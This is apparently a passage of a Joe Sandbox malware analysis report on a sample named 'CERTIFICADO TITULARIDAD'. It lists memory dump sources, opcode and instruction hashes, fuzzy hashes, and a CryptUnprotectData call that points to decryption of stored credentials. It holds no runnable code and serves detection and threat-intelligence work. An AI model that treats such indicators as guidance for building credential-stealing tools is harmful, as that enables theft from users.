                                                                                                                          • Instruction ID: 5e592368b4cd3af5024904aa101d1a83ace1005e973770d5925081787c9a3c55
                                                                                                                          • Opcode Fuzzy Hash: d4acd28dfbc70571a7f3ca81744483a7da62c33396cd9ae2f94c3433e75f0596
                                                                                                                          • Instruction Fuzzy Hash: 7073E531D10B5A8EDB11EF68C844A99F7B1FF99300F51D69AE44877261EB70AAC4CF81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1102 3a3a87a8-3a3a8f6a CryptUnprotectData 1104 3a3a8f6c-3a3a8f72 1102->1104 1105 3a3a8f73-3a3a8f9b 1102->1105 1104->1105
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A3A8F5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: 5ea50de2946a0dedfc274ccc2c826db624a0c110d8a93cf685892ba7d942ee0d
                                                                                                                          • Instruction ID: b0521a641a85b0b862bdf46e3dabc9f473b01557781f8bab8061efa01ba34cdf
                                                                                                                          • Opcode Fuzzy Hash: 5ea50de2946a0dedfc274ccc2c826db624a0c110d8a93cf685892ba7d942ee0d
                                                                                                                          • Instruction Fuzzy Hash: 82115976800359EFDB10CF99D840BDEBBF5EB48320F14845AE518A7210C779A550DFA5
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A3A8F5D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 834300711-0
                                                                                                                          • Opcode ID: 07effe75e5a1820ba46a5ddf448270ebb1d7d624d871180bc49f2c55538738d0
                                                                                                                          • Instruction ID: 0f4223e4f82e6ac53100c2e00b00ef0244920b12b6c9522f6733a2a30eb6e573
                                                                                                                          • Opcode Fuzzy Hash: 07effe75e5a1820ba46a5ddf448270ebb1d7d624d871180bc49f2c55538738d0
                                                                                                                          • Instruction Fuzzy Hash: 36113776800249EFDB10CF99D940BDEBFF5EF48320F14845AE958A7211C739A550DFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 17f8c8960618917c3e4d9b070b446926f64f3b2c2702f3f488bd5538244792ae
                                                                                                                          • Instruction ID: 6d2e7ac302755e533cf65a3d4c4eb8834c3dcba51ce5b5177a026c30e9fa4f58
                                                                                                                          • Opcode Fuzzy Hash: 17f8c8960618917c3e4d9b070b446926f64f3b2c2702f3f488bd5538244792ae
                                                                                                                          • Instruction Fuzzy Hash: 9DA25E71B042099FCB15CFA8C984AAEBBF2BF89310F15855AE405DB365D731ED41CB62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403677783.000000003A430000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A430000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a430000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: afbbc133a478521aec8a2129bda56de5bd3fca267f56ec30f82025ac20edb1fb
                                                                                                                          • Instruction ID: 981afea6fec31a1e9542ee86f14871c16fce9f181a2ca0f8bdcbe0f664c1529b
                                                                                                                          • Opcode Fuzzy Hash: afbbc133a478521aec8a2129bda56de5bd3fca267f56ec30f82025ac20edb1fb
                                                                                                                          • Instruction Fuzzy Hash: F5825B74E012288FDB64DF69CD95BDDBBB2BB89301F1081EA951DA72A5DB305E81CF40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403677783.000000003A430000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A430000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a430000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51aac78731f12638f440849ccb3343d9cea276942d6cd8d83c48a63c2aefaed6
                                                                                                                          • Instruction ID: d8ed309f337b4acfb9f98e6c985bb10ecf609a0eb32f018a02b5829dfc5cbef2
                                                                                                                          • Opcode Fuzzy Hash: 51aac78731f12638f440849ccb3343d9cea276942d6cd8d83c48a63c2aefaed6
                                                                                                                          • Instruction Fuzzy Hash: 2E727D74E012289FEB64DF69C995BDEBBB2BF89300F1081E9950DA7261DB315E81CF41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 947fc2102cf5279097d59340cbfcb19404d19c1319d1f19461e76dbc1c89a9cd
                                                                                                                          • Instruction ID: 85c891739948bc870780c0db28e5d80cbdc2e24817dd6e758787493746f5c3a3
                                                                                                                          • Opcode Fuzzy Hash: 947fc2102cf5279097d59340cbfcb19404d19c1319d1f19461e76dbc1c89a9cd
                                                                                                                          • Instruction Fuzzy Hash: DD127170B002199FDB14DF69C854BAEBBF6BF88300F20816AE545EB395DB319D45CBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 21bf40c0f78355e19d7c3cdfaaddb55e2fd59aa01be1e55f59341af42d0206ce
                                                                                                                          • Instruction ID: cfc0312881aeb2548d0b50a34059c532a2dceeace50b52ce1b6a6630a0663439
                                                                                                                          • Opcode Fuzzy Hash: 21bf40c0f78355e19d7c3cdfaaddb55e2fd59aa01be1e55f59341af42d0206ce
                                                                                                                          • Instruction Fuzzy Hash: 21024030A04259DFCB55CFA9D884AADBBF2BF48300F55805AE849AB361E730DD41CF61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0536c4309250b8d454d42484c6ae8824e01583fce486613c15ee764bd7e4775f
                                                                                                                          • Instruction ID: 739ab16f3c0d5838acad9bf2a5676ab6ccb23c2adb98a5c5752dcaf5da1d63f7
                                                                                                                          • Opcode Fuzzy Hash: 0536c4309250b8d454d42484c6ae8824e01583fce486613c15ee764bd7e4775f
                                                                                                                          • Instruction Fuzzy Hash: 1CF1D474D04218CFEB14DFA9C984B9DBBB2BF88704F5482A9D848AB355DB709D86CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7e080b4e3944993ee71763166655f0274cf0aeedefb27ee70d56c2423eff26b2
                                                                                                                          • Instruction ID: 5b3ba871f4db3aacb3c9f8450a0295077571be3be7d4a33167e57a9bd5bed403
                                                                                                                          • Opcode Fuzzy Hash: 7e080b4e3944993ee71763166655f0274cf0aeedefb27ee70d56c2423eff26b2
                                                                                                                          • Instruction Fuzzy Hash: F6E1B174E01218CFEB64DFA5C980B9DBBB2BF89300F2081A9D819B7355DB359A85CF11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b76f78f6b331a09b61777856a6cb556879faff776c2a8337605c004c2ea8018a
                                                                                                                          • Instruction ID: 7006f4ce01d30866800a4670304048801a7e838f29a6d568206d8c63cc033f22
                                                                                                                          • Opcode Fuzzy Hash: b76f78f6b331a09b61777856a6cb556879faff776c2a8337605c004c2ea8018a
                                                                                                                          • Instruction Fuzzy Hash: F6E19F74E01218CFEB54DFA5C944B9DBBB2BF89304F2081AAD809BB391DB355A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d02fafc12c539250078bea4cac768112f57950aa0d57ec26bd4106a753bef84
                                                                                                                          • Instruction ID: 5828a62797a07759a2ddde8084aebcbf89d9f7847d9fd7469a293f2850a6391b
                                                                                                                          • Opcode Fuzzy Hash: 2d02fafc12c539250078bea4cac768112f57950aa0d57ec26bd4106a753bef84
                                                                                                                          • Instruction Fuzzy Hash: 8BD17D74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D819AB355DB359E82CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403703136.000000003A440000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A440000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a440000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c15b70371d4b5c193e20a9edf75526e94b29282c56c33c49a378084ef4945666
                                                                                                                          • Instruction ID: f6c4d9abf5e1acbfaa288f6e4bd2dc3c91072ed867356d414cc1dc3b11592802
                                                                                                                          • Opcode Fuzzy Hash: c15b70371d4b5c193e20a9edf75526e94b29282c56c33c49a378084ef4945666
                                                                                                                          • Instruction Fuzzy Hash: 71D17F74E01218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E82CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9066b6c85738d5d20f10d4c857c86d1522924e18a15e79772367064e54f09126
                                                                                                                          • Instruction ID: cbb587e00a1a8323192864f7797f9be57a45f356950e494c12d0dde058161c1f
                                                                                                                          • Opcode Fuzzy Hash: 9066b6c85738d5d20f10d4c857c86d1522924e18a15e79772367064e54f09126
                                                                                                                          • Instruction Fuzzy Hash: DAD19E78E01218CFEB54DFA5C990B9DBBB2BF89300F1081A9D809BB355DB359986CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d0b5473760d68cc4da04ee6c3c981d2a807feb128c9de36d89c039889b84630a
                                                                                                                          • Instruction ID: 3a1ecd32a56c27d084e39199ad30cbe7195c988bac615b8d68fcd4401d9b1173
                                                                                                                          • Opcode Fuzzy Hash: d0b5473760d68cc4da04ee6c3c981d2a807feb128c9de36d89c039889b84630a
                                                                                                                          • Instruction Fuzzy Hash: C2D19F78E01218CFEB54DFA5C980B9DBBB2BF89300F1091A9D809BB355DB35A985CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7ba3377e5078590d788b05679c2a5c0c08530c104d0d8ef67b3f13002eca0389
                                                                                                                          • Instruction ID: e91fe9b05f057f9c97f11aaead33059a7a866e3f05b60c1119c0345e41275e13
                                                                                                                          • Opcode Fuzzy Hash: 7ba3377e5078590d788b05679c2a5c0c08530c104d0d8ef67b3f13002eca0389
                                                                                                                          • Instruction Fuzzy Hash: BBD19E78E01218CFEB54DFA5C980B9DBBB2BF89300F1091A9D909BB355DB359986CF11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a9c13196dfe826978b5152b0d60ec93c5955f0fb8f66bfc404ff7a2057838bad
                                                                                                                          • Instruction ID: 66168059321123ce210505fa00b3f3b752cb4d6eb9d439dcab68b811462bc3b1
                                                                                                                          • Opcode Fuzzy Hash: a9c13196dfe826978b5152b0d60ec93c5955f0fb8f66bfc404ff7a2057838bad
                                                                                                                          • Instruction Fuzzy Hash: 02C19074E01218CFEB14DFA5C944B9DBBB2FF89300F5081A9D809AB355DB359A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b3d907968d9a930f150ef09eb577b0da2d433f02f4a809016a84f25a38371a8
                                                                                                                          • Instruction ID: 6e164dd704472793738b4e3ec19596c26b88c01c5f3ee0127d01878f7a9f71cb
                                                                                                                          • Opcode Fuzzy Hash: 5b3d907968d9a930f150ef09eb577b0da2d433f02f4a809016a84f25a38371a8
                                                                                                                          • Instruction Fuzzy Hash: 53C19F74E01218CFEB54DFA5C944B9DBBB2EF89300F6081A9D809BB365DB359A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403580145.000000003A3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A3A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a3a0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 93dd13f1078cd1c823063a86419a87d8885baabf5462940f45e8947d68a05c47
                                                                                                                          • Instruction ID: 3e6fa4f0217ea6c661196febc9df301e5ea4d0bcaf1eb30f124278f1572d2d03
                                                                                                                          • Opcode Fuzzy Hash: 93dd13f1078cd1c823063a86419a87d8885baabf5462940f45e8947d68a05c47
                                                                                                                          • Instruction Fuzzy Hash: 36C19E74E01218CFEB54DFA5C984B9DBBB2FF89300F6081A9D809AB355DB359A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f838a2c8512ab28ab3ef89aa56d9bb66845f3288c5a3c04d75d31266eeebb372
                                                                                                                          • Instruction ID: 61f2c0c58f2ba963990a3faa738e7236eeb967d87149c6c5bea72815eef5a5d0
                                                                                                                          • Opcode Fuzzy Hash: f838a2c8512ab28ab3ef89aa56d9bb66845f3288c5a3c04d75d31266eeebb372
                                                                                                                          • Instruction Fuzzy Hash: 389155B5912609CFEB00AFF0D9997EEBBB1BB46302F00542AE101772E1CB794A45CF65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 651a1f36fda8e262da73e95cb4a5415dad51009c5dd9dffc312f5fc8ddb8fc9e
                                                                                                                          • Instruction ID: 04df275ac5239c18dc6cb2092469c692732054e2e20f98e4467efac70d6002f1
                                                                                                                          • Opcode Fuzzy Hash: 651a1f36fda8e262da73e95cb4a5415dad51009c5dd9dffc312f5fc8ddb8fc9e
                                                                                                                          • Instruction Fuzzy Hash: E49156B5912609CFEB00AFE0D9997EEBBB1FB46302F00542AE101772E1CB794A45CF65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7969d8e0ab658e800b301cfefe396ca6ce17439fd46ebcc398401d81b7ef591e
                                                                                                                          • Instruction ID: 11ee6c5f5ca1b474cfd25f087ef9da1e3fc49e8b2e73bba6f9b63e37a99b5ea7
                                                                                                                          • Opcode Fuzzy Hash: 7969d8e0ab658e800b301cfefe396ca6ce17439fd46ebcc398401d81b7ef591e
                                                                                                                          • Instruction Fuzzy Hash: 32A1C875E00219DFEB54DFA9C884A9DBBF2BF89300F14806AE409AB365DB709D42CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 802b583fa00745ae7675e89c36fce6c242dc39137591d5a093d2d242d0d6d1e3
                                                                                                                          • Instruction ID: 6877666f989c5c02f2deb04c38319be2f3fe7b9ea8e1ce045a235e1e56f168c8
                                                                                                                          • Opcode Fuzzy Hash: 802b583fa00745ae7675e89c36fce6c242dc39137591d5a093d2d242d0d6d1e3
                                                                                                                          • Instruction Fuzzy Hash: EAA10270D00208CFEB14DFA5C944BDDBBB1FF89314F209269E948AB2A1DB759985CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cf8958114c8616a5ae30adad4bc90e052ec9ccfa7eb74aa4e2ea48fccbe37583
                                                                                                                          • Instruction ID: f4394ec233f2264a417b7c6f1b5430a4e291da92685cd046979ca118a6c9fdfb
                                                                                                                          • Opcode Fuzzy Hash: cf8958114c8616a5ae30adad4bc90e052ec9ccfa7eb74aa4e2ea48fccbe37583
                                                                                                                          • Instruction Fuzzy Hash: F3A182B5D012198FEB68CF6AC944BDDBBF2AF88300F14C1A9D848A7254DB345A85CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0d621b44164d5c0d39e1e38a974e0a3f9d40171dc6fbe170bd30ce5b75e43f14
                                                                                                                          • Instruction ID: 1116d5e34fdcb3e8d0b552b970537aea06811b266630c052530405a88d79a552
                                                                                                                          • Opcode Fuzzy Hash: 0d621b44164d5c0d39e1e38a974e0a3f9d40171dc6fbe170bd30ce5b75e43f14
                                                                                                                          • Instruction Fuzzy Hash: 23A194B5D01219CFEB64CF6AC944B9EBBF2BF88300F14C1A9D448A7250DB349A85CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: df5aa63959800ad79d812357bd3a5187781da1be6f9f8c9b61e7ec1c53da627f
                                                                                                                          • Instruction ID: d6c25c3540a34a665275ebe30dba3d8df2ac111b4a2287416d375ee54e7c2291
                                                                                                                          • Opcode Fuzzy Hash: df5aa63959800ad79d812357bd3a5187781da1be6f9f8c9b61e7ec1c53da627f
                                                                                                                          • Instruction Fuzzy Hash: 5EA1E374D002088FEB14DFA5C944BDDBBB1FF89304F209269E948AB2A2DB759985CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c59a4e6921b4e3e5c6004167e8ee60eb07714ad0755057809feb869b09731541
                                                                                                                          • Instruction ID: 9ac37d5e52059cdcab019caa6a7a3888ca3de70704ee623bec24077f04e2a99c
                                                                                                                          • Opcode Fuzzy Hash: c59a4e6921b4e3e5c6004167e8ee60eb07714ad0755057809feb869b09731541
                                                                                                                          • Instruction Fuzzy Hash: 0091E074E00208CFEB10DFA9C884BDCBBB1FF49714F209269E849AB291DB759985CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403677783.000000003A430000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A430000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a430000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4c320f85d8014da163fa44291ff5d9dddf16c87fc6b8cd04f387536708889bd7
                                                                                                                          • Instruction ID: 2e2e5618588237ce4544e22a492e482f57a92f7b4874e837e946f84556fc23f2
                                                                                                                          • Opcode Fuzzy Hash: 4c320f85d8014da163fa44291ff5d9dddf16c87fc6b8cd04f387536708889bd7
                                                                                                                          • Instruction Fuzzy Hash: 7381E274E012189FEB65DB69CC51BEEBBB2AF89300F5081A9D45DA7291DB305E81CF44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9deec56b0fb7e80d52ac919ab463ad7133dfd1e1c59849542ffc4a8ff60662b5
                                                                                                                          • Instruction ID: 35d8d98de6f6a773edd30ccffcf882f789e0cecfbbfe33bff2ec7341a8b4de8a
                                                                                                                          • Opcode Fuzzy Hash: 9deec56b0fb7e80d52ac919ab463ad7133dfd1e1c59849542ffc4a8ff60662b5
                                                                                                                          • Instruction Fuzzy Hash: B581AE75E01258CFEB14DFA9C980AADBBB2FF89300F208169D815BB355DB359946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403703136.000000003A440000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A440000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a440000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a38f259875dfaf6293e7217e788d47039a7855f7e29ba3cf1b573dbcb8d7c85e
                                                                                                                          • Instruction ID: 6c1e34ac15948a3cd31aeb8caada86ca1b164770c97a59af06161e778a271044
                                                                                                                          • Opcode Fuzzy Hash: a38f259875dfaf6293e7217e788d47039a7855f7e29ba3cf1b573dbcb8d7c85e
                                                                                                                          • Instruction Fuzzy Hash: 6281AE75E00258CFEB14DFA5C990AADBBB2FF88300F208169D815BB355EB359946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403703136.000000003A440000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A440000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a440000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 57a446e7ae6363e5549f92923abe37bc8ec7e63de46ca1b653c56058dd0d0f33
                                                                                                                          • Instruction ID: 2e141e726849d580e6fc9aa0a51f853c0d131415b3b5ce1d3dcffb5ca48e55f1
                                                                                                                          • Opcode Fuzzy Hash: 57a446e7ae6363e5549f92923abe37bc8ec7e63de46ca1b653c56058dd0d0f33
                                                                                                                          • Instruction Fuzzy Hash: EE81AD75E01258CFEB14DFA9C981AADBBB2FF88300F208169D815BB355EB359946CF50
                                                                                                                          Memory Dump Source
